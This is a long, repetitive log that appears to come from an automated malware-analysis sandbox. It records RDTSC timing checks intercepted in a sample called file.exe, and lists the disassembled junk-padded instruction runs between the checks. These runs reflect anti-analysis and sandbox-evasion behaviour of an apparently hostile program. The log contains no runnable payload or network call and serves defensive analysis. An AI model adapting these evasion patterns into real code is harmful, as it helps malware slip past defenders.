Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9E75 second address: FF9E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9E81 second address: FF9E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF7EA1 second address: FF7EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF7FF0 second address: FF8009 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB1DCC289DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FB1DCC289D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8489 second address: FF849E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007FB1DD323666h 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF849E second address: FF84AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF89A6 second address: FF89AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF89AC second address: FF89B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8C84 second address: FF8C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FB1DD323671h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF925C second address: FF9271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1DCC289E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9271 second address: FF92A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1DD323673h 0x00000012 jmp 00007FB1DD323678h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF92A9 second address: FF92C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9B41 second address: FF9B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFDDB2 second address: FFDDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFDDB6 second address: FFDDC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jg 00007FB1DD323666h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE086 second address: FFE08A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE08A second address: FFE090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE327 second address: FFE32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE32B second address: FFE330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE487 second address: FFE48B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE732 second address: FFE748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FB1DD323666h 0x00000010 jng 00007FB1DD323666h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100C9C8 second address: 100C9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100C9CD second address: 100CA0F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB1DD32366Eh 0x00000008 pushad 0x00000009 jnp 00007FB1DD323666h 0x0000000f jmp 00007FB1DD32366Eh 0x00000014 jmp 00007FB1DD323675h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100CA0F second address: 100CA39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB1DCC289F1h 0x0000000c jmp 00007FB1DCC289E5h 0x00000011 jnc 00007FB1DCC289D6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100CA39 second address: 100CA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100CA3F second address: 100CA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100ABC1 second address: 100ABD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB1DD32366Eh 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100AD45 second address: 100AD49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100AD49 second address: 100AD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B1E8 second address: 100B21C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB1DCC289E3h 0x00000011 jo 00007FB1DCC289D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F0D7 second address: 100F0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB1DD323666h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007FB1DD323666h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10152AB second address: 10152CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FB1DCC289E2h 0x0000000e jnl 00007FB1DCC289D6h 0x00000014 jnc 00007FB1DCC289D6h 0x0000001a jc 00007FB1DCC289DEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10152CD second address: 10152D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026B10 second address: 1026B2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026693 second address: 1026697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026697 second address: 10266AF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1DCC289D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FB1DCC289D8h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10266AF second address: 10266B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102D94D second address: 102D953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102D953 second address: 102D960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102D960 second address: 102D964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103DAC8 second address: 103DACD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4782E second address: F47834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103E2E2 second address: 103E2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FB1DD323668h 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103E463 second address: 103E467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103E467 second address: 103E46B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103E46B second address: 103E471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103E471 second address: 103E485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FB1DD323672h 0x0000000c je 00007FB1DD323666h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10475E8 second address: 1047608 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB1DCC289D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB1DCC289DEh 0x0000000f je 00007FB1DCC289E2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1047608 second address: 104760E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104760E second address: 1047630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB1DCC289F2h 0x0000000a jmp 00007FB1DCC289E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1047630 second address: 1047652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB1DD32366Fh 0x0000000c jnl 00007FB1DD32366Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1047652 second address: 1047661 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB1DCC289D8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10501E8 second address: 10501EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10501EE second address: 10501F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10501F2 second address: 1050219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB1DD323672h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1DD32366Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050219 second address: 1050223 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB1DCC289D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050071 second address: 1050077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050077 second address: 105007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1056750 second address: 105676A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB1DD323671h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1056596 second address: 10565B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DCC289E4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10565B0 second address: 10565BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052BAE second address: 1052BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052BB2 second address: 1052BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052BB8 second address: 1052BD6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB1DCC289E2h 0x00000008 pop edi 0x00000009 jc 00007FB1DCC289DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107DC94 second address: 107DCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DD32366Fh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107DCAA second address: 107DCE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB1DCC289E1h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b jno 00007FB1DCC289D8h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FB1DCC289DDh 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107DCE1 second address: 107DCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107CB46 second address: 107CB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FB1DCC289E1h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1DCC289DBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107CB6D second address: 107CB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107CFF2 second address: 107CFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107D701 second address: 107D70B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB1DD323666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107D70B second address: 107D729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FB1DCC289D6h 0x0000000e jmp 00007FB1DCC289E0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107D729 second address: 107D72D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107D849 second address: 107D85A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107D85A second address: 107D87D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB1DD323685h 0x00000008 jmp 00007FB1DD323679h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107F2F2 second address: 107F2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107F2F6 second address: 107F2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107F2FE second address: 107F30B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FB1DCC289D6h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1081F6B second address: 1081F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10822F4 second address: 108231F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB1DCC289E5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108231F second address: 1082331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD32366Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1082331 second address: 108234F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB1DCC289DCh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jc 00007FB1DCC289E4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108234F second address: 1082353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1084E66 second address: 1084E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1084E6A second address: 1084E70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8020D second address: 4C8024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1DCC289DFh 0x00000009 xor si, 683Eh 0x0000000e jmp 00007FB1DCC289E9h 0x00000013 popfd 0x00000014 mov cx, 5787h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8024C second address: 4C80253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, D5h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80253 second address: 4C80262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80262 second address: 4C80266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80266 second address: 4C8026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8026C second address: 4C80290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60E04 second address: 4C60E12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60E12 second address: 4C60E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD32366Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60E24 second address: 4C60E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1DCC289E3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60E42 second address: 4C60E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB05EE second address: 4CB05F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB05F4 second address: 4CB0630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 9FF3h 0x00000007 pushfd 0x00000008 jmp 00007FB1DD323678h 0x0000000d or ecx, 7E1E74F8h 0x00000013 jmp 00007FB1DD32366Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0630 second address: 4CB0634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0634 second address: 4CB063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
